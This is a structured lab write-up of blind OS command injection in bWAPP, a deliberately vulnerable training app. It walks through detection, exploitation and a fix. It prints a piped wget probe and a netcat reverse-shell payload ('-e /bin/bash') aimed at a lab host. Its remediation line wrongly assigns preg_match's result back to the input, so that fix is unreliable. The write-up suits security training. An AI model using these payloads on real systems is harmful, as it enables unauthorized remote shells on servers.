## Version 1.4.1
## language: en

Feature: Command-Injection-Blind-Medium
  TOE:
    bWAPP
  Category:
    Command Injection
  Location:
    http://192.168.1.3/bWAPP/commandi_blind.php - target (field)
  CWE:
    CWE-78: Improper Neutralization of Special Elements used
    in an OS Command ('OS Command Injection')
  Rule:
    REQ.173: https://fluidattacks.com/web/rules/173/
  Goal:
    Execute commands in the system
  Recommendation:
    Validate inputs to only receive IPs

  Background:
  Hacker's software:
    | <Software name> | <Version>   |
    | Kali linux      | 4.19.0      |
    | Firefox         | 60.6.2      |
    | BurpSuite       | 1.7.36-56   |
    | Netcat          | v1.10-41    |
  TOE information:
    Given The site
    When I enter into it
    Then bWAPP level is set to medium

  Scenario: Normal use case
    Given The site
    When A user wants to make a ping command to a given IP
    Then He types into the target field
    And The server makes the request

   Scenario: Static detection
     Given The source code
     When I see the validation
     """
     $input = str_replace("&", "", $data);
     $input = str_replace(";", "", $input);
     """
     Then I know that I can't use '&' or ';'
     When I think in another way to join commands
     Then I can use '|' to pipe the commands
     And I have a command injection vulnerability

   Scenario: Dynamic detection
     Given The site
     When I intercept the request using BurpSuite
     Then I inject my command using piped commands
     """
     1.2.3.4|+wget+http%3a//192.168.1.4
     """
     When I run a Netcat listener on the port 80
     Then I can see a request comming from the server
     And I have command execution [evidence](image1.png)

   Scenario: Exploitation
     Given The vulnerability
     When I intercept the request with BurpSuite
     Then I can send a command to get a reverse shell
     """
     1.2.3.4|nc+192.168.1.4+1234+-e+/bin/bash|+sleep+20
     """
     When I start a Netcat in my computer
     """
     $ nc -nvlp 1234
     """
     Then I see a connection [evidence](image2.png)
     And I have a shell on the server

   Scenario: Remediation
     Given The source code
     When I add a function to validate IP addresses
     """
     $input = preg_match('/^\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\z/', $input);
     """
     Then I only can send IP as parameters
     And The vulnerability is patched

  Scenario: Scoring
    Severity scoring according to CVSSv3 standard
    Base: Attributes that are constants over time and organizations
      9.4/10 (Criticals) - AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:L
    Temporal: Attributes that measure the exploit's popularity and fixability
      8.0/10 (High) - E:F/RL:O/RC:U/CR:H/IR:H/AR:L
    Environmental: Unique and relevant attributes to a specific user environment
      8.4/10 (High) - MAV:N/MAC:L/MPR:N/MUI:N/MS:U/MC:H/MI:H/MA:L

  Scenario: Correlations
    No correlations have been found to this date 2019-10-11
